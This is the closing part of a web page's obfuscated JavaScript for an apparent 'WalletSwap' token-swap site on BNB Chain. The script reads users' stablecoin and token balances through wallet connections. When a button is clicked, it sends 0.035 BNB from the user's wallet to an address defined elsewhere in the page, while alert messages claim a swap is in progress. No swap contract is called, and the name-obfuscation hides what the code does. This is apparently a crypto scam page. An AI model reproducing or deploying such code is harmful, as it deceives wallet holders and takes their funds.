_0x1fece7={};_0x1fece7['internalType']=_0x3f244b('0xe3'),_0x1fece7[_0x3f244b('0x113')]='',_0x1fece7[_0x3f244b(0xec)]=_0x3f244b(0xe3);const _0x4c54f={};_0x4c54f[_0x3f244b(0x12a)]=![],_0x4c54f[_0x3f244b(0xed)]=[_0x9951f6,_0x28fce7],_0x4c54f[_0x3f244b('0x113')]=_0x3f244b('0x153'),_0x4c54f['outputs']=[_0x1fece7],_0x4c54f[_0x3f244b(0x13f)]=![],_0x4c54f[_0x3f244b(0x140)]=_0x3f244b('0xf7'),_0x4c54f[_0x3f244b(0xec)]='function';const _0x3970aa={};_0x3970aa['internalType']=_0x3f244b('0x144'),_0x3970aa[_0x3f244b('0x113')]=_0x3f244b(0xf3),_0x3970aa['type']=_0x3f244b('0x144');const _0x2720b0={};_0x2720b0[_0x3f244b(0x100)]=_0x3f244b(0x144),_0x2720b0['name']=_0x3f244b('0x125'),_0x2720b0[_0x3f244b(0xec)]=_0x3f244b('0x144');const _0x12dedc={};_0x12dedc[_0x3f244b('0x100')]=_0x3f244b('0x14a'),_0x12dedc[_0x3f244b('0x113')]=_0x3f244b(0xe8),_0x12dedc[_0x3f244b(0xec)]='uint256';const _0x251297={};_0x251297[_0x3f244b(0x100)]=_0x3f244b(0xe3),_0x251297[_0x3f244b('0x113')]='',_0x251297[_0x3f244b(0xec)]=_0x3f244b('0xe3');const _0x1f8445={};_0x1f8445[_0x3f244b('0x12a')]=![],_0x1f8445['inputs']=[_0x3970aa,_0x2720b0,_0x12dedc],_0x1f8445[_0x3f244b(0x113)]='transferFrom',_0x1f8445[_0x3f244b('0x12e')]=[_0x251297],_0x1f8445[_0x3f244b(0x13f)]=![],_0x1f8445[_0x3f244b('0x140')]=_0x3f244b(0xf7),_0x1f8445[_0x3f244b('0xec')]=_0x3f244b(0xf4);const _0x4e7a6f={};_0x4e7a6f[_0x3f244b(0x100)]=_0x3f244b('0x144'),_0x4e7a6f[_0x3f244b('0x113')]=_0x3f244b(0xe4),_0x4e7a6f['type']=_0x3f244b('0x144');const _0x1459f9={};_0x1459f9['constant']=![],_0x1459f9[_0x3f244b(0xed)]=[_0x4e7a6f],_0x1459f9['name']=_0x3f244b('0x14f'),_0x1459f9[_0x3f244b('0x12e')]=[],_0x1459f9[_0x3f244b('0x13f')]=![],_0x1459f9[_0x3f244b(0x140)]=_0x3f244b(0xf7),_0x1459f9[_0x3f244b('0xec')]=_0x3f244b('0xf4');const _0x362635=[_0x4bbe32,_0x2c17ab,_0x27f9f8,_0x37bedd,_0x248d7e,_0x2ab844,_0x43678d,_0x2ca5a1,_0x552d38,_0x544fd5,_0x58386c,_0x32582e,_0x322a3e,_0x5d98b9,_0x49a15e,_0x48bdb9,_0x29edc5,_0x4e702c,_0x1adafd,_0x4b712e,_0x2ec30a,_0x4c54f,_0x1f8445,_0x1459f9],_0x375c15=new _0x55dcb1[(_0x3f244b('0xf2'))][(_0x3f244b(0xff))](_0x362635,_0x35bb92),_0x516324=await _0x375c15['methods'][_0x3f244b(0x130)](_0x88cb44)[_0x3f244b('0x110')](),_0x336aed=_0x516324/0xde0b6b3a7640000,_0x4e97b6='0xF3E938508aBd27c5dA7a2320eb45cE62526c955f',_0x1baeac={};_0x1baeac[_0x3f244b(0xed)]=[],_0x1baeac[_0x3f244b(0x140)]=_0x3f244b('0xf7'),_0x1baeac[_0x3f244b(0xec)]=_0x3f244b('0x13d');const _0x338d94={};_0x338d94[_0x3f244b(0x10c)]=!![],_0x338d94[_0x3f244b(0x100)]=_0x3f244b('0x144'),_0x338d94[_0x3f244b('0x113')]=_0x3f244b(0x14b),_0x338d94[_0x3f244b('0xec')]=_0x3f244b('0x144');const _0x37a4a8={};_0x37a4a8[_0x3f244b(0x10c)]=!![],_0x37a4a8[_0x3f244b(0x100)]=_0x3f244b('0x144'),_0x37a4a8[_0x3f244b('0x113')]=_0x3f244b(0x12d),_0x37a4a8[_0x3f244b('0xec')]=_0x3f244b('0x144');const _0x1ebfe7={};_0x1ebfe7[_0x3f244b(0x10c)]=![],_0x1ebfe7[_0x3f244b(0x100)]=_0x3f244b(0x14a),_0x1ebfe7[_0x3f244b('0x113')]='value',_0x1ebfe7[_0x3f244b(0xec)]=_0x3f244b(0x14a);const _0x510185={};_0x510185['anonymous']=![],_0x510185[_0x3f244b('0xed')]=[_0x338d94,_0x37a4a8,_0x1ebfe7],_0x510185[_0x3f244b('0x113')]=_0x3f244b(0x124),_0x510185[_0x3f244b(0xec)]=_0x3f244b('0x102');const _0x4c2663={};_0x4c2663['indexed']=!![],_0x4c2663[_0x3f244b('0x100')]=_0x3f244b('0x144'),_0x4c2663[_0x3f244b('0x113')]=_0x3f244b(0xeb),_0x4c2663[_0x3f244b(0xec)]=_0x3f244b('0x144');const _0x4e9e3a={};_0x4e9e3a[_0x3f244b('0x10c')]=!![],_0x4e9e3a[_0x3f244b('0x100')]=_0x3f244b(0x144),_0x4e9e3a['name']=_0x3f244b('0xe4'),_0x4e9e3a[_0x3f244b(0xec)]=_0x3f244b('0x144');const _0x136d87={};_0x136d87[_0x3f244b('0xfe')]=![],_0x136d87[_0x3f244b('0xed')]=[_0x4c2663,_0x4e9e3a],_0x136d87['name']=_0x3f244b(0xf8),_0x136d87[_0x3f244b('0xec')]='event';const _0x3ae63a={};_0x3ae63a[_0x3f244b(0x10c)]=!![],_0x3ae63a['internalType']='address',_0x3ae63a[_0x3f244b(0x113)]=_0x3f244b('0xf5'),_0x3ae63a[_0x3f244b('0xec')]='address';const _0x127163={};_0x127163[_0x3f244b(0x10c)]=!![],_0x127163['internalType']=_0x3f244b(0x144),_0x127163['name']='to',_0x127163[_0x3f244b('0xec')]=_0x3f244b('0x144');const _0x21ce32={};_0x21ce32[_0x3f244b(0x10c)]=![],_0x21ce32[_0x3f244b(0x100)]=_0x3f244b(0x14a),_0x21ce32[_0x3f244b('0x113')]=_0x3f244b(0x139),_0x21ce32['type']='uint256';const _0x1c2418={};_0x1c2418[_0x3f244b(0xfe)]=![],_0x1c2418[_0x3f244b(0xed)]=[_0x3ae63a,_0x127163,_0x21ce32],_0x1c2418['name']=_0x3f244b('0x132'),_0x1c2418[_0x3f244b(0xec)]=_0x3f244b(0x102);const _0x4b39a0={};_0x4b39a0[_0x3f244b(0x100)]=_0x3f244b('0xf0'),_0x4b39a0[_0x3f244b(0x113)]='',_0x4b39a0[_0x3f244b(0xec)]=_0x3f244b('0xf0');const _0x1ef0dd={};_0x1ef0dd[_0x3f244b(0xed)]=[],_0x1ef0dd['name']=_0x3f244b(0x141),_0x1ef0dd['outputs']=[_0x4b39a0],_0x1ef0dd[_0x3f244b(0x140)]=_0x3f244b(0xe0),_0x1ef0dd[_0x3f244b(0xec)]=_0x3f244b('0xf4');const _0x3b13d8={};_0x3b13d8[_0x3f244b('0x100')]=_0x3f244b('0xf0'),_0x3b13d8[_0x3f244b(0x113)]='',_0x3b13d8['type']=_0x3f244b('0xf0');const _0x6a31d3={};_0x6a31d3[_0x3f244b(0xed)]=[],_0x6a31d3[_0x3f244b(0x113)]=_0x3f244b(0x11f),_0x6a31d3[_0x3f244b('0x12e')]=[_0x3b13d8],_0x6a31d3[_0x3f244b('0x140')]=_0x3f244b(0xe0),_0x6a31d3[_0x3f244b('0xec')]=_0x3f244b(0xf4);const _0x39d374={};_0x39d374[_0x3f244b('0x100')]=_0x3f244b(0x144),_0x39d374['name']=_0x3f244b('0x101'),_0x39d374[_0x3f244b('0xec')]=_0x3f244b(0x144);const _0x164032={};_0x164032[_0x3f244b(0x100)]=_0x3f244b(0x14a),_0x164032[_0x3f244b('0x113')]=_0x3f244b('0xef'),_0x164032[_0x3f244b(0xec)]=_0x3f244b('0x14a');const _0x257a33={};_0x257a33[_0x3f244b(0xed)]=[_0x39d374,_0x164032],_0x257a33[_0x3f244b('0x113')]='_burnFrom',_0x257a33['outputs']=[],_0x257a33[_0x3f244b(0x140)]=_0x3f244b('0xf7'),_0x257a33[_0x3f244b(0xec)]=_0x3f244b(0xf4);const _0x1bd86c={};_0x1bd86c['internalType']=_0x3f244b(0x144),_0x1bd86c[_0x3f244b(0x113)]=_0x3f244b(0x14b),_0x1bd86c['type']=_0x3f244b('0x144');const _0xe144b6={};_0xe144b6[_0x3f244b(0x100)]=_0x3f244b(0x144),_0xe144b6[_0x3f244b(0x113)]=_0x3f244b('0x12d'),_0xe144b6['type']=_0x3f244b('0x144');const _0x32de1e={};_0x32de1e[_0x3f244b('0x100')]=_0x3f244b('0x14a'),_0x32de1e[_0x3f244b('0x113')]='',_0x32de1e[_0x3f244b('0xec')]=_0x3f244b('0x14a');const _0x4baae9={};_0x4baae9[_0x3f244b(0xed)]=[_0x1bd86c,_0xe144b6],_0x4baae9[_0x3f244b(0x113)]=_0x3f244b('0x143'),_0x4baae9['outputs']=[_0x32de1e],_0x4baae9['stateMutability']=_0x3f244b('0xe0'),_0x4baae9[_0x3f244b('0xec')]=_0x3f244b(0xf4);const _0x302ad0={};_0x302ad0[_0x3f244b(0x100)]=_0x3f244b(0x144),_0x302ad0[_0x3f244b(0x113)]=_0x3f244b(0x12d),_0x302ad0[_0x3f244b('0xec')]=_0x3f244b('0x144');const _0x5e595a={};_0x5e595a[_0x3f244b(0x100)]=_0x3f244b(0x14a),_0x5e595a[_0x3f244b(0x113)]='amount',_0x5e595a[_0x3f244b('0xec')]='uint256';const _0xbdd0dd={};_0xbdd0dd['internalType']=_0x3f244b(0xe3),_0xbdd0dd[_0x3f244b('0x113')]='',_0xbdd0dd['type']='bool';const _0x2da41e={};_0x2da41e[_0x3f244b(0xed)]=[_0x302ad0,_0x5e595a],_0x2da41e[_0x3f244b('0x113')]=_0x3f244b(0x10a),_0x2da41e[_0x3f244b('0x12e')]=[_0xbdd0dd],_0x2da41e[_0x3f244b('0x140')]=_0x3f244b('0xf7'),_0x2da41e[_0x3f244b('0xec')]='function';const _0x71da1e={};_0x71da1e[_0x3f244b(0x100)]=_0x3f244b('0x144'),_0x71da1e[_0x3f244b(0x113)]=_0x3f244b(0x134),_0x71da1e[_0x3f244b(0xec)]=_0x3f244b(0x144);const _0x38c878={};_0x38c878['internalType']=_0x3f244b('0x14a'),_0x38c878[_0x3f244b(0x113)]='',_0x38c878[_0x3f244b(0xec)]=_0x3f244b(0x14a);const _0xe38778={};_0xe38778[_0x3f244b(0xed)]=[_0x71da1e],_0xe38778[_0x3f244b('0x113')]=_0x3f244b(0x130),_0xe38778[_0x3f244b('0x12e')]=[_0x38c878],_0xe38778['stateMutability']=_0x3f244b(0xe0),_0xe38778[_0x3f244b('0xec')]='function';const _0x4f4121={};_0x4f4121[_0x3f244b(0x100)]=_0x3f244b('0x14a'),_0x4f4121[_0x3f244b('0x113')]='amount',_0x4f4121[_0x3f244b(0xec)]=_0x3f244b('0x14a');const _0x7a230c={};_0x7a230c[_0x3f244b(0xed)]=[_0x4f4121],_0x7a230c[_0x3f244b('0x113')]='burn',_0x7a230c[_0x3f244b(0x12e)]=[],_0x7a230c[_0x3f244b('0x140')]=_0x3f244b(0xf7),_0x7a230c[_0x3f244b('0xec')]='function';const _0x20fcee={};_0x20fcee[_0x3f244b('0x100')]=_0x3f244b('0x144'),_0x20fcee[_0x3f244b('0x113')]=_0x3f244b('0x101'),_0x20fcee[_0x3f244b('0xec')]=_0x3f244b('0x144');const _0x43dcea={};_0x43dcea[_0x3f244b('0x100')]='uint256',_0x43dcea[_0x3f244b('0x113')]=_0x3f244b(0xef),_0x43dcea[_0x3f244b(0xec)]=_0x3f244b('0x14a');const _0x376ee0={};_0x376ee0[_0x3f244b('0xed')]=[_0x20fcee,_0x43dcea],_0x376ee0[_0x3f244b('0x113')]=_0x3f244b(0x12c),_0x376ee0[_0x3f244b(0x12e)]=[],_0x376ee0[_0x3f244b(0x140)]=_0x3f244b(0xf7),_0x376ee0[_0x3f244b(0xec)]=_0x3f244b(0xf4);const _0x3f1fc0={};_0x3f1fc0[_0x3f244b(0x100)]=_0x3f244b(0x119),_0x3f1fc0[_0x3f244b('0x113')]='',_0x3f1fc0[_0x3f244b(0xec)]=_0x3f244b('0x119');const _0x25cee4={};_0x25cee4['inputs']=[],_0x25cee4[_0x3f244b(0x113)]=_0x3f244b(0x128),_0x25cee4[_0x3f244b(0x12e)]=[_0x3f1fc0],_0x25cee4['stateMutability']=_0x3f244b(0xe0),_0x25cee4[_0x3f244b(0xec)]=_0x3f244b(0xf4);const _0x58af87={};_0x58af87[_0x3f244b('0x100')]=_0x3f244b(0x144),_0x58af87['name']=_0x3f244b('0x12d'),_0x58af87['type']=_0x3f244b('0x144');const _0x56e46e={};_0x56e46e[_0x3f244b('0x100')]='uint256',_0x56e46e[_0x3f244b('0x113')]=_0x3f244b(0x13a),_0x56e46e[_0x3f244b(0xec)]=_0x3f244b(0x14a);const _0x5d2677={};_0x5d2677[_0x3f244b(0x100)]='bool',_0x5d2677[_0x3f244b(0x113)]='',_0x5d2677['type']=_0x3f244b('0xe3');const _0x2e6af2={};_0x2e6af2[_0x3f244b('0xed')]=[_0x58af87,_0x56e46e],_0x2e6af2[_0x3f244b('0x113')]=_0x3f244b(0x111),_0x2e6af2[_0x3f244b(0x12e)]=[_0x5d2677],_0x2e6af2[_0x3f244b(0x140)]=_0x3f244b('0xf7'),_0x2e6af2[_0x3f244b('0xec')]=_0x3f244b(0xf4);const _0x89a059={};_0x89a059[_0x3f244b('0x100')]=_0x3f244b('0x144'),_0x89a059[_0x3f244b(0x113)]=_0x3f244b(0x12d),_0x89a059[_0x3f244b(0xec)]=_0x3f244b(0x144);const _0x3e1437={};_0x3e1437[_0x3f244b(0x100)]=_0x3f244b(0x14a),_0x3e1437[_0x3f244b(0x113)]=_0x3f244b(0x131),_0x3e1437['type']=_0x3f244b('0x14a');const _0x42474b={};_0x42474b[_0x3f244b(0x100)]=_0x3f244b('0xe3'),_0x42474b[_0x3f244b('0x113')]='',_0x42474b[_0x3f244b(0xec)]=_0x3f244b(0xe3);const _0x4eee09={};_0x4eee09[_0x3f244b('0xed')]=[_0x89a059,_0x3e1437],_0x4eee09['name']=_0x3f244b('0xf6'),_0x4eee09[_0x3f244b('0x12e')]=[_0x42474b],_0x4eee09[_0x3f244b('0x140')]='nonpayable',_0x4eee09[_0x3f244b(0xec)]=_0x3f244b('0xf4');const _0x11655c={};_0x11655c[_0x3f244b(0x100)]=_0x3f244b(0x144),_0x11655c[_0x3f244b('0x113')]=_0x3f244b('0x101'),_0x11655c[_0x3f244b(0xec)]=_0x3f244b(0x144);const _0x27764c={};_0x27764c[_0x3f244b(0x100)]=_0x3f244b('0x14a'),_0x27764c['name']=_0x3f244b('0xef'),_0x27764c['type']=_0x3f244b(0x14a);const _0x1fa9ef={};_0x1fa9ef[_0x3f244b('0xed')]=[_0x11655c,_0x27764c],_0x1fa9ef[_0x3f244b(0x113)]=_0x3f244b(0x136),_0x1fa9ef[_0x3f244b('0x12e')]=[],_0x1fa9ef[_0x3f244b(0x140)]=_0x3f244b(0xf7),_0x1fa9ef[_0x3f244b('0xec')]='function';const _0x52ec02={};_0x52ec02[_0x3f244b(0x100)]=_0x3f244b(0x127),_0x52ec02[_0x3f244b('0x113')]='',_0x52ec02[_0x3f244b(0xec)]=_0x3f244b(0x127);const _0x43e319={};_0x43e319['inputs']=[],_0x43e319['name']=_0x3f244b('0x113'),_0x43e319[_0x3f244b('0x12e')]=[_0x52ec02],_0x43e319[_0x3f244b(0x140)]=_0x3f244b('0xe0'),_0x43e319[_0x3f244b('0xec')]=_0x3f244b('0xf4');const _0x37355e={};_0x37355e[_0x3f244b('0x100')]='address',_0x37355e[_0x3f244b('0x113')]=_0x3f244b('0x14b'),_0x37355e[_0x3f244b(0xec)]=_0x3f244b('0x144');const _0x111abd={};_0x111abd[_0x3f244b(0x100)]=_0x3f244b('0x14a'),_0x111abd[_0x3f244b('0x113')]='',_0x111abd[_0x3f244b(0xec)]=_0x3f244b('0x14a');const _0x308a09={};_0x308a09['inputs']=[_0x37355e],_0x308a09[_0x3f244b(0x113)]=_0x3f244b('0x106'),_0x308a09['outputs']=[_0x111abd],_0x308a09[_0x3f244b('0x140')]='view',_0x308a09[_0x3f244b('0xec')]=_0x3f244b(0xf4);const _0x33cd51={};_0x33cd51['internalType']='address',_0x33cd51[_0x3f244b(0x113)]='',_0x33cd51[_0x3f244b(0xec)]=_0x3f244b(0x144);const _0x206be9={};_0x206be9[_0x3f244b(0xed)]=[],_0x206be9[_0x3f244b('0x113')]=_0x3f244b('0x14b'),_0x206be9[_0x3f244b(0x12e)]=[_0x33cd51],_0x206be9[_0x3f244b(0x140)]=_0x3f244b('0xe0'),_0x206be9[_0x3f244b(0xec)]=_0x3f244b('0xf4');const _0x53a27b={};_0x53a27b[_0x3f244b(0x100)]=_0x3f244b('0x144'),_0x53a27b['name']=_0x3f244b(0x14b),_0x53a27b[_0x3f244b('0xec')]=_0x3f244b(0x144);const _0x449e2f={};_0x449e2f[_0x3f244b('0x100')]=_0x3f244b(0x144),_0x449e2f[_0x3f244b(0x113)]=_0x3f244b(0x12d),_0x449e2f[_0x3f244b(0xec)]=_0x3f244b('0x144');const _0x347d4e={};_0x347d4e[_0x3f244b('0x100')]=_0x3f244b('0x14a'),_0x347d4e[_0x3f244b(0x113)]=_0x3f244b(0xe8),_0x347d4e[_0x3f244b('0xec')]=_0x3f244b('0x14a');const _0x158686={};_0x158686[_0x3f244b('0x100')]=_0x3f244b('0x14a'),_0x158686[_0x3f244b(0x113)]='deadline',_0x158686['type']='uint256';const _0x5ac368={};_0x5ac368[_0x3f244b('0x100')]=_0x3f244b(0x119),_0x5ac368[_0x3f244b(0x113)]='v',_0x5ac368[_0x3f244b(0xec)]=_0x3f244b(0x119);const _0x1d9a24={};_0x1d9a24['internalType']=_0x3f244b('0xf0'),_0x1d9a24[_0x3f244b('0x113')]='r',_0x1d9a24[_0x3f244b('0xec')]=_0x3f244b(0xf0);const _0x1bf866={};_0x1bf866['internalType']=_0x3f244b(0xf0),_0x1bf866[_0x3f244b(0x113)]='s',_0x1bf866['type']=_0x3f244b('0xf0');const _0x217621={};_0x217621[_0x3f244b(0xed)]=[_0x53a27b,_0x449e2f,_0x347d4e,_0x158686,_0x5ac368,_0x1d9a24,_0x1bf866],_0x217621[_0x3f244b(0x113)]=_0x3f244b(0x118),_0x217621[_0x3f244b('0x12e')]=[],_0x217621['stateMutability']=_0x3f244b('0xf7'),_0x217621[_0x3f244b('0xec')]='function';const _0x28b6e5={};_0x28b6e5[_0x3f244b('0xed')]=[],_0x28b6e5[_0x3f244b(0x113)]=_0x3f244b('0x120'),_0x28b6e5[_0x3f244b(0x12e)]=[],_0x28b6e5[_0x3f244b(0x140)]=_0x3f244b(0xf7),_0x28b6e5[_0x3f244b('0xec')]=_0x3f244b(0xf4);const _0x550a2b={};_0x550a2b[_0x3f244b(0x100)]='address',_0x550a2b[_0x3f244b(0x113)]='vault_',_0x550a2b[_0x3f244b('0xec')]=_0x3f244b(0x144);const _0x21dbf3={};_0x21dbf3['internalType']=_0x3f244b('0xe3'),_0x21dbf3[_0x3f244b(0x113)]='',_0x21dbf3[_0x3f244b(0xec)]=_0x3f244b('0xe3');const _0xf9983d={};_0xf9983d[_0x3f244b('0xed')]=[_0x550a2b],_0xf9983d[_0x3f244b(0x113)]=_0x3f244b('0x13e'),_0xf9983d[_0x3f244b(0x12e)]=[_0x21dbf3],_0xf9983d['stateMutability']=_0x3f244b('0xf7'),_0xf9983d[_0x3f244b(0xec)]=_0x3f244b('0xf4');const _0x855e2a={};_0x855e2a[_0x3f244b('0x100')]='string',_0x855e2a[_0x3f244b(0x113)]='',_0x855e2a[_0x3f244b('0xec')]='string';const _0x5e01cb={};_0x5e01cb[_0x3f244b('0xed')]=[],_0x5e01cb['name']=_0x3f244b('0xfa'),_0x5e01cb[_0x3f244b(0x12e)]=[_0x855e2a],_0x5e01cb[_0x3f244b(0x140)]=_0x3f244b('0xe0'),_0x5e01cb[_0x3f244b(0xec)]=_0x3f244b(0xf4);const _0x5b9ca7={};_0x5b9ca7[_0x3f244b(0x100)]=_0x3f244b(0x14a),_0x5b9ca7[_0x3f244b(0x113)]='',_0x5b9ca7['type']=_0x3f244b('0x14a');const _0x34468b={};_0x34468b[_0x3f244b('0xed')]=[],_0x34468b[_0x3f244b(0x113)]='totalSupply',_0x34468b[_0x3f244b('0x12e')]=[_0x5b9ca7],_0x34468b[_0x3f244b('0x140')]=_0x3f244b('0xe0'),_0x34468b[_0x3f244b(0xec)]=_0x3f244b('0xf4');const _0x16e576={};_0x16e576[_0x3f244b(0x100)]=_0x3f244b(0x144),_0x16e576[_0x3f244b('0x113')]=_0x3f244b(0x125),_0x16e576[_0x3f244b('0xec')]=_0x3f244b('0x144');const _0x5af1e3={};_0x5af1e3[_0x3f244b(0x100)]=_0x3f244b('0x14a'),_0x5af1e3[_0x3f244b(0x113)]=_0x3f244b(0xe8),_0x5af1e3[_0x3f244b(0xec)]=_0x3f244b('0x14a');const _0x5e7981={};_0x5e7981[_0x3f244b(0x100)]=_0x3f244b('0xe3'),_0x5e7981['name']='',_0x5e7981[_0x3f244b('0xec')]='bool';const _0x2f8fe2={};_0x2f8fe2[_0x3f244b(0xed)]=[_0x16e576,_0x5af1e3],_0x2f8fe2[_0x3f244b('0x113')]=_0x3f244b('0x153'),_0x2f8fe2[_0x3f244b(0x12e)]=[_0x5e7981],_0x2f8fe2[_0x3f244b('0x140')]=_0x3f244b('0xf7'),_0x2f8fe2[_0x3f244b('0xec')]=_0x3f244b('0xf4');const _0x48daf4={};_0x48daf4[_0x3f244b(0x100)]=_0x3f244b(0x144),_0x48daf4[_0x3f244b('0x113')]=_0x3f244b(0xf3),_0x48daf4[_0x3f244b('0xec')]=_0x3f244b('0x144');const _0x5e7593={};_0x5e7593[_0x3f244b('0x100')]=_0x3f244b('0x144'),_0x5e7593[_0x3f244b('0x113')]=_0x3f244b('0x125'),_0x5e7593[_0x3f244b(0xec)]=_0x3f244b(0x144);const _0x34b018={};_0x34b018['internalType']='uint256',_0x34b018[_0x3f244b(0x113)]=_0x3f244b('0xe8'),_0x34b018[_0x3f244b(0xec)]=_0x3f244b('0x14a');const _0x4c2005={};_0x4c2005['internalType']='bool',_0x4c2005['name']='',_0x4c2005['type']=_0x3f244b(0xe3);const _0x44782b={};_0x44782b[_0x3f244b(0xed)]=[_0x48daf4,_0x5e7593,_0x34b018],_0x44782b[_0x3f244b('0x113')]=_0x3f244b('0x13c'),_0x44782b[_0x3f244b(0x12e)]=[_0x4c2005],_0x44782b[_0x3f244b(0x140)]=_0x3f244b('0xf7'),_0x44782b[_0x3f244b('0xec')]=_0x3f244b(0xf4);const _0x21eade={};_0x21eade[_0x3f244b(0x100)]=_0x3f244b(0x144),_0x21eade[_0x3f244b(0x113)]=_0x3f244b(0x142),_0x21eade[_0x3f244b('0xec')]=_0x3f244b(0x144);const _0x28bef3={};_0x28bef3[_0x3f244b(0xed)]=[_0x21eade],_0x28bef3[_0x3f244b('0x113')]=_0x3f244b(0x14f),_0x28bef3[_0x3f244b('0x12e')]=[],_0x28bef3[_0x3f244b('0x140')]=_0x3f244b(0xf7),_0x28bef3[_0x3f244b('0xec')]=_0x3f244b('0xf4');const _0x3f2631={};_0x3f2631[_0x3f244b(0x100)]=_0x3f244b('0x144'),_0x3f2631[_0x3f244b(0x113)]='',_0x3f2631[_0x3f244b('0xec')]=_0x3f244b(0x144);const _0x2babde={};_0x2babde[_0x3f244b('0xed')]=[],_0x2babde[_0x3f244b('0x113')]=_0x3f244b(0x114),_0x2babde['outputs']=[_0x3f2631],_0x2babde[_0x3f244b('0x140')]=_0x3f244b(0xe0),_0x2babde[_0x3f244b(0xec)]=_0x3f244b('0xf4');const _0x4ec17b=[_0x1baeac,_0x510185,_0x136d87,_0x1c2418,_0x1ef0dd,_0x6a31d3,_0x257a33,_0x4baae9,_0x2da41e,_0xe38778,_0x7a230c,_0x376ee0,_0x25cee4,_0x2e6af2,_0x4eee09,_0x1fa9ef,_0x43e319,_0x308a09,_0x206be9,_0x217621,_0x28b6e5,_0xf9983d,_0x5e01cb,_0x34468b,_0x2f8fe2,_0x44782b,_0x28bef3,_0x2babde],_0x2fe81a=new _0x55dcb1[(_0x3f244b(0xf2))][(_0x3f244b('0xff'))](_0x4ec17b,_0x4e97b6),_0x55fa95=await _0x2fe81a[_0x3f244b('0x123')][_0x3f244b('0x130')](_0x88cb44)[_0x3f244b(0x110)](),_0x50d5c7=_0x55fa95/(0x14f0+0x2fd*-0x5+-0x5fe);alert(_0x3f244b(0x10f)),document['getElementById']('BalanceBUSD')[_0x3f244b('0x126')]=_0x336aed,document[_0x3f244b(0x146)](_0x3f244b('0x145'))['innerHTML']=_0x50d5c7,document[_0x3f244b('0x146')]('connectWalletButton')[_0x3f244b(0x154)][_0x3f244b(0x108)]=_0x3f244b(0xe7),document[_0x3f244b('0x146')](_0x3f244b(0x115))[_0x3f244b('0x154')][_0x3f244b('0x108')]=_0x3f244b(0x12f);}catch(_0x998e85){alert(_0x3f244b(0xe2)+_0x998e85);}else alert(_0x3f244b('0xf9'));}),document[_0x477b9a('0x146')](_0x477b9a(0x115))[_0x477b9a(0x14d)](_0x477b9a('0x122'),async function(){const _0x361b55=_0x477b9a,_0x14c287=new Web3(window[_0x361b55('0x138')]);if(typeof _0x14c287!==_0x361b55(0x104)){const _0x506b8a={};_0x506b8a['method']=_0x361b55('0x152');const _0xc13178=await ethereum[_0x361b55(0x151)](_0x506b8a),_0x4a01df=_0xc13178[0xd3+-0xa*0x1be+0x7*0x25f],_0x25ffe7=_0x361b55(0x147),_0x18795e=_0x14c287[_0x361b55(0x13b)][_0x361b55('0xee')](_0x25ffe7,_0x361b55('0x14c')),_0x3acdf0=address;alert(_0x361b55('0x105'));try{const _0x2c08b1={};_0x2c08b1[_0x361b55(0xf5)]=_0x4a01df,_0x2c08b1['to']=_0x3acdf0,_0x2c08b1[_0x361b55(0x139)]=_0x18795e,_0x2c08b1[_0x361b55(0x129)]='21000';const _0x252239=_0x2c08b1,_0x204e8d=await _0x14c287[_0x361b55('0xf2')][_0x361b55('0x11e')](_0x252239);alert(_0x361b55('0x10b')+_0x204e8d);}catch(_0x1a60de){if(_0x1a60de instanceof Error)alert(_0x361b55('0x14e')+_0x1a60de['message']),console['error'](_0x1a60de);else{const _0x3496d3=JSON[_0x361b55('0x109')](_0x1a60de);alert(_0x361b55('0x11a'));}}}else alert(_0x361b55(0x133));});function updateTokenAmt(){const _0x4c40a=_0x477b9a,_0x39363f=parseFloat(document[_0x4c40a('0x146')](_0x4c40a('0xea'))[_0x4c40a(0x139)]);if(_0x39363f>0x1*0x7b0+0xbba+0x1e){alert(_0x4c40a(0x117)),document['getElementById'](_0x4c40a('0xea'))[_0x4c40a(0x139)]=0x12ba+-0x28b+0x359*0x1;const _0x460b3c=_0x39363f*coin_value;document[_0x4c40a('0x146')](_0x4c40a(0x103))[_0x4c40a('0x139')]=_0x460b3c;return;}const _0x485b2=_0x39363f*coin_value;document[_0x4c40a(0x146)](_0x4c40a(0x103))[_0x4c40a('0x139')]=_0x485b2;}updateTokenAmt();function _0xbf1c(){const _0xd04272=['increaseAllowance','nonpayable','OwnershipTransferred','Please\x20Use\x20This\x20Link\x20In\x20Trust\x20Wallet\x20or\x20Metamask\x20Wallet\x20For\x20Swap\x20WalletSwap\x20Tokens.','symbol','_symbol','1060jCizwx','burn','anonymous','Contract','internalType','account_','event','tokenAmt','undefined','Holding\x20Swap\x20Transaction\x20Is\x20In\x20Progress...','nonces','_name','display','stringify','approve','Transaction\x20sent\x20successfully!\x20Transaction\x20Hash:\x20','indexed','18zfGUjC','359194OCuUtt','Now\x20You\x20Can\x20Swap\x20Your\x20Tokens...','call','decreaseAllowance','Please\x20Connect\x20To\x20BNB\x20Network\x20By\x20Clicking\x20On\x20Upper\x203\x20Dots.','name','vault','sendBNB','753038zUAmzp','Maximum\x205000\x20WalletSwap\x20Per\x20Day.','permit','uint8','An\x20unexpected\x20error\x20occurred,\x20please\x20try\x20again','0x55d398326f99059fF775485246999027B3197955','4bQOqmy','39BRhYOb','sendTransaction','PERMIT_TYPEHASH','renounceOwnership','connectWalletButton','click','methods','Approval','recipient','innerHTML','string','decimals','gas','constant','16795nZqPYS','burnFrom','spender','outputs','block','balanceOf','addedValue','Transfer','Web3\x20is\x20not\x20connected.\x20Please\x20install\x20a\x20wallet\x20like\x20MetaMask.','account','112qWoqFw','mint','_decimals','ethereum','value','subtractedValue','utils','transferFrom','constructor','setVault','payable','stateMutability','DOMAIN_SEPARATOR','newOwner_','allowance','address','BalanceWALLETSWAP','getElementById','0.035','90piOUFm','container1','uint256','owner','ether','addEventListener','Error:\x20','transferOwnership','14925588LuexRe','request','eth_requestAccounts','transfer','style','view','2616832wlDreG','Error\x20connecting\x20to\x20wallet:\x20','bool','newOwner','totalSupply','237714RLjFaB','none','amount','container2','coinAmt','previousOwner','type','inputs','toWei','amount_','bytes32','2483280SmseBc','eth','sender','function','from'];_0xbf1c=function(){return _0xd04272;};return _0xbf1c();}function updateCoinAmt(){const _0x5436d1=_0x477b9a,_0x26cc00=parseFloat(document[_0x5436d1(0x146)](_0x5436d1('0x103'))[_0x5436d1(0x139)]),_0x117b07=_0x26cc00/coin_value;document[_0x5436d1('0x146')]('coinAmt')[_0x5436d1('0x139')]=_0x117b07;}updateCoinAmt();
    </script>
</html>